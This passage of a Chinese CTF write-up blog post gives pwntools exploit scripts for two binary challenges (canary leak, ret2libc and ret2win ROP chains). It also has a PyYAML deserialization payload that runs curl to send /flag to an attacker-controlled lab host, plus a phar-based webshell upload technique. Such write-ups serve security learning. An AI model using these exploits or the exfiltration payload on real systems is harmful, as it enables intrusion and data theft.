class="string">&#x27;puts&#x27;</span>]</span><br><span class="line"><span class="comment">#puts_got_address</span></span><br><span class="line">puts_got_addr = elf.got[<span class="string">&#x27;puts&#x27;</span>]</span><br><span class="line"><span class="comment">#vul_funtion_addr</span></span><br><span class="line">vul_func_addr= elf.symbols[<span class="string">&#x27;show_data&#x27;</span>]</span><br><span class="line"></span><br><span class="line"><span class="comment">#libc = ELF(&#x27;./libc-2.23.so&#x27;)#题目给的libc是有问题的</span></span><br><span class="line"><span class="comment">#overflow offset</span></span><br><span class="line">overflow_offset = <span class="string">b&#x27;a&#x27;</span>*(<span class="number">0x110</span>- <span class="number">0x10</span> + <span class="number">8</span>)</span><br><span class="line">log.success(<span class="string">f&quot;puts_plt_addr:<span class="subst">&#123;<span class="built_in">hex</span>(puts_plt_addr)&#125;</span>&quot;</span>)</span><br><span class="line">log.success(<span class="string">f&quot;puts_got_addr:<span class="subst">&#123;<span class="built_in">hex</span>(puts_got_addr)&#125;</span>&quot;</span>)</span><br><span class="line">log.success(<span class="string">f&quot;vul_func_addr:<span class="subst">&#123;<span class="built_in">hex</span>(vul_func_addr)&#125;</span>&quot;</span>)</span><br><span class="line">log.success(<span class="string">f&quot;pop_rdi_ret:<span class="subst">&#123;<span class="built_in">hex</span>(pop_rdi_ret)&#125;</span>&quot;</span>)</span><br><span class="line">DEBUG = <span class="number">1</span></span><br><span class="line"><span class="keyword">if</span> DEBUG:</span><br><span class="line">    p = process()</span><br><span class="line">    <span class="comment">#gdb.attach(p,&quot;b *show_data&quot;)</span></span><br><span class="line"><span class="keyword">else</span>:</span><br><span class="line">    p = remote(<span class="string">&#x27;192.168.56.229&#x27;</span>,<span class="number">29009</span>)</span><br><span class="line"><span class="comment">#泄露canary地址,因为覆盖掉了canary的低位00，所以需要补全</span></span><br><span class="line">payload = overflow_offset</span><br><span class="line">p.sendlineafter(<span class="string">&quot;please input the choice\n&quot;</span>,<span class="string">&quot;1&quot;</span>)</span><br><span class="line">p.sendlineafter(<span class="string">&quot;input the size:\n&quot;</span>,<span class="built_in">str</span>(<span class="built_in">len</span>(payload)+<span class="number">1</span>))</span><br><span class="line">p.sendlineafter(<span class="string">&quot;input the content:\n&quot;</span>,payload)</span><br><span class="line">p.sendlineafter(<span class="string">&quot;please input the choice\n&quot;</span>,<span class="string">&quot;0&quot;</span>)</span><br><span class="line">p.recvline()</span><br><span class="line">canary_addr = u64(<span class="string">b&#x27;\x00&#x27;</span> + p.recvline()[-<span class="number">8</span>:-<span class="number">1</span>])</span><br><span class="line">log.success(<span class="string">f&quot;canary_addr:<span class="subst">&#123;<span class="built_in">hex</span>(canary_addr)&#125;</span>&quot;</span>)</span><br><span class="line"><span class="comment">#泄露puts真实地址</span></span><br><span class="line">payload = overflow_offset + p64(canary_addr)+p64(<span class="number">0</span>) +p64(pop_rdi_ret) + p64(puts_got_addr) + p64(puts_plt_addr) + p64(vul_func_addr)</span><br><span class="line"><span class="built_in">print</span>(payload)</span><br><span class="line">p.sendlineafter(<span class="string">&quot;please input the choice\n&quot;</span>,<span class="string">&quot;1&quot;</span>)</span><br><span class="line">p.sendlineafter(<span class="string">&quot;input the size:\n&quot;</span>,<span class="built_in">str</span>(<span class="built_in">len</span>(payload)))</span><br><span class="line">p.sendlineafter(<span class="string">&quot;input the content:\n&quot;</span>,payload)</span><br><span class="line">puts_real_addr = u64(p.recvuntil(<span class="string">b&#x27;\x7f&#x27;</span>)[-<span class="number">6</span>:].ljust(<span class="number">8</span>,<span class="string">b&#x27;\x00&#x27;</span>))</span><br><span class="line">log.success(<span class="string">f&quot;puts_real_addr:<span class="subst">&#123;<span class="built_in">hex</span>(puts_real_addr)&#125;</span>&quot;</span>)</span><br><span class="line"><span class="comment">#计算基址</span></span><br><span class="line">libc = LibcSearcher(<span class="string">&#x27;puts&#x27;</span>,puts_real_addr)</span><br><span class="line">libc_base = puts_real_addr - libc.dump(<span class="string">&#x27;puts&#x27;</span>)</span><br><span class="line"><span class="comment">#libc.address=puts_real_addr-libc.sym[&#x27;puts&#x27;]</span></span><br><span class="line"><span class="comment">#system_addr</span></span><br><span class="line">system_addr = libc_base + libc.dump(<span class="string">&#x27;system&#x27;</span>)</span><br><span class="line"><span class="comment">#system_addr = libc.symbols[&#x27;system&#x27;]</span></span><br><span class="line"><span class="comment">#bin_sh_addr</span></span><br><span class="line">bin_sh_addr = libc_base + libc.dump(<span class="string">&quot;str_bin_sh&quot;</span>)</span><br><span class="line"><span class="comment">#bin_sh_addr = next(libc.search(b&quot;/bin/sh&quot;))</span></span><br><span class="line"><span class="comment">#getshell</span></span><br><span class="line">payload = overflow_offset + p64(canary_addr)+p64(<span class="number">0</span>)+ p64(pop_rdi_ret) + p64(bin_sh_addr) + p64(system_addr)</span><br><span class="line">log.success(<span class="string">f&quot;system_addr:<span class="subst">&#123;<span class="built_in">hex</span>(system_addr)&#125;</span>&quot;</span>)</span><br><span class="line">log.success(<span class="string">f&quot;bin_sh_addr:<span class="subst">&#123;<span class="built_in">hex</span>(bin_sh_addr)&#125;</span>&quot;</span>)</span><br><span class="line">p.sendlineafter(<span class="string">&quot;please input the choice\n&quot;</span>,<span class="string">&quot;1&quot;</span>)</span><br><span class="line">p.sendlineafter(<span class="string">&quot;input the size:\n&quot;</span>,<span class="built_in">str</span>(<span class="built_in">len</span>(payload)))</span><br><span class="line">p.sendlineafter(<span class="string">&quot;input the content:\n&quot;</span>,payload)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>

<p>但是在虚拟机docker的pwn环境中，不知道何故，泄露出来的canary有问题，导致程序因为栈溢出而退出。。。。</p>
<h2 id="PWN2"><a href="#PWN2" class="headerlink" title="PWN2"></a>PWN2</h2><p>执行pwn程序，发现有个小游戏</p>
<p><img src="202202151609695.png" alt="image-20210926104222470"></p>
<p>查看ida pro发现main函数中，调用了game函数</p>
<p><img src="202202151609696.png" alt="image-20210926104153186"></p>
<p>查看game函数，发现完成100次加法计算后，跳到27行，输入名字，而输入的参数的长度是0x30，但是scanf没有限制读取的串长度，所以存在溢出。</p>
<p><img src="202202151609697.png" alt="image-20210926104340400"></p>
<p>题目存在get_flag的后门函数，直接可以getshell，只需要在输入名字的地方，将输入内容覆盖掉game函数return时候，栈中存的main函数地址，就可以实现return到get_flag函数中。</p>
<p>如下图，如果输入正常的字符，game函数执行到ret时，栈顶时main函数的地址</p>
<p><img src="202202151609698.png" alt="image-20211008181234594"></p>
<p>如果输入溢出长度的字符，并加上payload，栈顶就是payload的地址</p>
<p><img src="202202151609699.png" alt="image-20211008181153707"></p>
<p><img src="202202151609700.png" alt="image-20210926104521939"></p>
<p>exp利用到了去年一道题目的exp，计算1000次加减乘除</p>
<p>但是发现，在wsl本地调试的时候，无法pwn成功(Ubuntu-20.04的虚拟机也不行。。。)</p>
<p>&#x3D;&#x3D;Ubuntu18.04及以上的栈对齐问题&#x3D;&#x3D;</p>
<p>上面的exp在wsl和Ubuntu20.04的虚拟机上都没有办法使用，当时通过socat查看靶机的debug信息的时候，发现wsl和虚拟机上在最后的响应exp的时候，发现似乎数据与正常的kali差了8。</p>
<p>今天看了郝大神发来的一个截图，知道了所谓的栈对齐问题，即在ubuntu18.04及以上，system调用的地址，必须是16的整数倍，即0xabcd0类似的地址，而上述exp，在wsl中，system调用的地址，并不是16的整数倍，即没有16对齐，如下图所示</p>
<p><img src="202202151609701.png" alt="image-20210928173923971"></p>
<p>所以，即使ret到了get_flag函数，在system函数调用”&#x2F;bin&#x2F;sh”的时候，由于没有栈对齐，导致没有办法执行shell</p>
<p>既然需要对齐，只需要把payload长度再添加8即可，但是如果只是单纯添加8位的数据，会导致溢出的时候不能够返回到正确的get_flag函数地址，所以需要添加一个ret的地址，可以考虑直接用get_flag函数的ret地址，或用ROPgadget获取rdi的ret地址，然后添加到payload中即可</p>
<p><img src="202202151609702.png" alt="image-20210928174942366"></p>
<p>最后的exp</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">context (</span><br><span class="line">    log_level = <span class="string">&quot;debug&quot;</span>,</span><br><span class="line">    binary = <span class="string">&quot;./pwn&quot;</span>,</span><br><span class="line">    terminal = [<span class="string">&#x27;tmux&#x27;</span>,<span class="string">&#x27;splitw&#x27;</span>,<span class="string">&#x27;-h&#x27;</span>]</span><br><span class="line">)</span><br><span class="line">e = context.binary</span><br><span class="line">get_flag = e.symbols[<span class="string">&#x27;get_flag&#x27;</span>]</span><br><span class="line"><span class="comment">#ret_addr = e.symbols[&#x27;ret&#x27;]</span></span><br><span class="line"><span class="comment">#print(ret_addr)</span></span><br><span class="line">DEBUG = <span class="number">1</span></span><br><span class="line"><span class="keyword">if</span> DEBUG:</span><br><span class="line">    p = process()</span><br><span class="line">    gdb.attach(p,<span class="string">&quot;b *game+269\n b *game+274\n&quot;</span>)</span><br><span class="line"><span class="keyword">else</span>:</span><br><span class="line">    p = remote(<span class="string">&#x27;192.168.56.224&#x27;</span>,<span class="number">12345</span>)</span><br><span class="line">p.sendlineafter(<span class="string">&quot;3.exit\n&quot;</span>,<span class="string">&quot;1&quot;</span>)</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">100</span>):</span><br><span class="line">    recv = <span class="built_in">bytes</span>.decode(p.readuntil(<span class="string">&quot;=&quot;</span>),<span class="string">&#x27;utf-8&#x27;</span>)</span><br><span class="line">    res = <span class="built_in">eval</span>(recv.split(<span class="string">&quot;=&quot;</span>)[<span class="number">0</span>])</span><br><span class="line">    p.sendline(<span class="built_in">str</span>(res))</span><br><span class="line">payload = <span class="string">b&#x27;a&#x27;</span>*(<span class="number">0x30</span>+<span class="number">8</span>)+p64(<span class="number">0x400b03</span>)+p64(get_flag)</span><br><span class="line">p.sendlineafter(<span class="string">&quot;you are win,give me your name &quot;</span>,payload)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>

<p>栈平衡，成功getshell</p>
<p><img src="202202151609703.png" alt="image-20210928174856256"></p>
<p>2021.10.3日更新，前几天将wsl换成了ubuntu20.04，结果发现上面的exp中，rdi ret地址加到payload中会有问题，然后直接换一个ret地址，发现成功getshell。</p>
<h2 id="PWN3"><a href="#PWN3" class="headerlink" title="PWN3"></a>PWN3</h2><h1 id="Web"><a href="#Web" class="headerlink" title="Web"></a>Web</h1><h2 id="FlaskShop"><a href="#FlaskShop" class="headerlink" title="FlaskShop"></a>FlaskShop</h2><p>比赛的时候，因为可以用互联网，所以用题目名称搜了一下，发现这个题目是比赛的原题，总共有三个漏洞</p>
<blockquote>
<p><a target="_blank" rel="noopener" href="https://www.zhaoj.in/read-5525.html">https://www.zhaoj.in/read-5525.html</a></p>
</blockquote>
<p>但是题目修复了命令执行和SSTI，只剩一个upload的地方，可能存在yaml反序列化。</p>
<p>yaml发序列化是pyyaml库的漏洞，漏洞只存在&lt;pyyaml5.1中</p>
<p><img src="202202151609704.png" alt="image-20211005110949687"></p>
<p>可以看到，命令执行成功后，会返回0</p>
<p><img src="202202151609705.png" alt="image-20211005111117568"></p>
<p>执行失败会返回其他值。</p>
<p>由于页面不会回显任何内容，尝试进行bash反弹shell，失败。</p>
<p>在纠结是不是需要盲注的时候，发现此前做过的题目<a href="2021%E5%B9%B4%E8%87%AA%E6%B2%BB%E5%8C%BA%E7%AC%AC%E4%B8%89%E5%B1%8A%E2%80%9C%E7%8E%84%E7%9B%BE%E6%9D%AF%E2%80%9D%E5%9B%A2%E9%98%9FCTF.assets/2020%E5%B9%B4DASCTF%E4%BA%94%E6%9C%88%E7%BA%BF%E4%B8%8A%E8%B5%9B.md">帮帮小红花</a>，盲注的payload只会回显0，在一筹莫展的时候，想起来，可以通过curl外带啊。</p>
<p>最终的payload</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">!!python/<span class="built_in">object</span>/apply:os.system [<span class="string">&quot;curl http://192.168.56.229:8000/`cat /flag`&quot;</span>]</span><br></pre></td></tr></table></figure>

<p><img src="202202151609706.png" alt="image-20211005111938922"></p>
<p>复现是通过本地环境，将exp放到靶机上直接执行。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> yaml,os</span><br><span class="line"><span class="keyword">with</span> <span class="built_in">open</span>(<span class="string">&quot;./1.yml&quot;</span>)<span class="keyword">as</span> f:</span><br><span class="line">    serialize_obj = f.read()</span><br><span class="line">yaml.load(serialize_obj)</span><br></pre></td></tr></table></figure>



<h2 id="dabalengba"><a href="#dabalengba" class="headerlink" title="dabalengba"></a>dabalengba</h2><h2 id="inc-up"><a href="#inc-up" class="headerlink" title="inc_up"></a>inc_up</h2><p>原题<a href="D:\markdown_note\CTF\WriteUp\Web\2020CNCERT证书培训CTF.md">8</a></p>
<p>首先，include不加php后缀；</p>
<p>其次，上传通过把webshell压缩后修改为图片进行上传；</p>
<p>最后，通过phar协议读取压缩包图片中的webshell来实现getshell</p>

    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/WriteUp/" rel="tag"># WriteUp</a>
              <a href="/tags/%E8%87%AA%E6%B2%BB%E5%8C%BA/" rel="tag"># 自治区</a>
              <a href="/tags/%E7%8E%84%E7%9B%BE%E6%9D%AF/" rel="tag"># 玄盾杯</a>
              <a href="/tags/CTF/" rel="tag"># CTF</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item"></div>
      <div class="post-nav-item">
    <a href="/2021/10/15/2021%E8%87%AA%E6%B2%BB%E5%8C%BA%E7%AC%AC%E5%85%AD%E5%B1%8A%E9%80%89%E6%8B%94%E8%B5%9BCTF/" rel="next" title="2021自治区第六届个人选拔赛">
      2021自治区第六届个人选拔赛 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          
    <div class="comments" id="valine-comments"></div>

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          Table of Contents
        </li>
        <li class="sidebar-nav-overview">
          Overview
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#Crypto"><span class="nav-number">1.</span> <span class="nav-text">Crypto</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#RSA"><span class="nav-number">1.1.</span> <span class="nav-text">RSA</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#peigenya"><span class="nav-number">1.2.</span> <span class="nav-text">peigenya</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#base"><span class="nav-number">1.3.</span> <span class="nav-text">base</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#AES-%E5%BE%85%E8%A1%A5%E5%85%85"><span class="nav-number">1.4.</span> <span class="nav-text">AES | 待补充</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Misc"><span class="nav-number">2.</span> <span class="nav-text">Misc</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#PNG"><span class="nav-number">2.1.</span> <span class="nav-text">PNG</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Reverse"><span class="nav-number">3.</span> <span class="nav-text">Reverse</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#EasyRE"><span class="nav-number">3.1.</span> <span class="nav-text">EasyRE</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#APK"><span class="nav-number">3.2.</span> <span class="nav-text">APK</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#map"><span class="nav-number">3.3.</span> <span class="nav-text">map</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#PWN"><span class="nav-number">4.</span> <span class="nav-text">PWN</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#PWN1"><span class="nav-number">4.1.</span> <span class="nav-text">PWN1</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#PWN2"><span class="nav-number">4.2.</span> <span class="nav-text">PWN2</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#PWN3"><span class="nav-number">4.3.</span> <span class="nav-text">PWN3</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Web"><span class="nav-number">5.</span> <span class="nav-text">Web</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#FlaskShop"><span class="nav-number">5.1.</span> <span class="nav-text">FlaskShop</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#dabalengba"><span class="nav-number">5.2.</span> <span class="nav-text">dabalengba</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#inc-up"><span class="nav-number">5.3.</span> <span class="nav-text">inc_up</span></a></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">Paulownia</p>
  <div class="site-description" itemprop="description">一只不专业的细狗</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives">
          <span class="site-state-item-count">8</span>
          <span class="site-state-item-name">posts</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">3</span>
        <span class="site-state-item-name">categories</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">12</span>
        <span class="site-state-item-name">tags</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author motion-element">
      <span class="links-of-author-item">
        <a href="https://github.com/BMLovePanda" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;BMLovePanda" rel="noopener" target="_blank"><i class="fab fa-github fa-fw"></i>GitHub</a>
      </span>
      <span class="links-of-author-item">
        <a href="mailto:zhrui06@gmail.com" title="E-Mail → mailto:zhrui06@gmail.com" rel="noopener" target="_blank"><i class="fa fa-envelope fa-fw"></i>E-Mail</a>
      </span>
  </div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2024</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Paulownia</span>
</div>
  <div class="powered-by">Powered by <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://muse.theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Muse</a>
  </div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/muse.js"></script>


<script src="/js/next-boot.js"></script>




  















  

  


<script>
NexT.utils.loadComments(document.querySelector('#valine-comments'), () => {
  NexT.utils.getScript('//unpkg.com/valine/dist/Valine.min.js', () => {
    var GUEST = ['nick', 'mail', 'link'];
    var guest = 'nick,mail,link';
    guest = guest.split(',').filter(item => {
      return GUEST.includes(item);
    });
    new Valine({
      el         : '#valine-comments',
      verify     : true,
      notify     : true,
      appId      : 'ht1Spwh002m1TkaTLxmGorwj-gzGzoHsz',
      appKey     : 'aqaYLOhc4JZ0YM4fCg3xoRtO',
      placeholder: "写点什么吧",
      avatar     : 'mm',
      meta       : guest,
      pageSize   : '10' || 10,
      visitor    : true,
      lang       : '' || 'zh-cn',
      path       : location.pathname,
      recordIP   : false,
      serverURLs : ''
    });
  }, window.Valine);
});
</script>

</body>
</html>
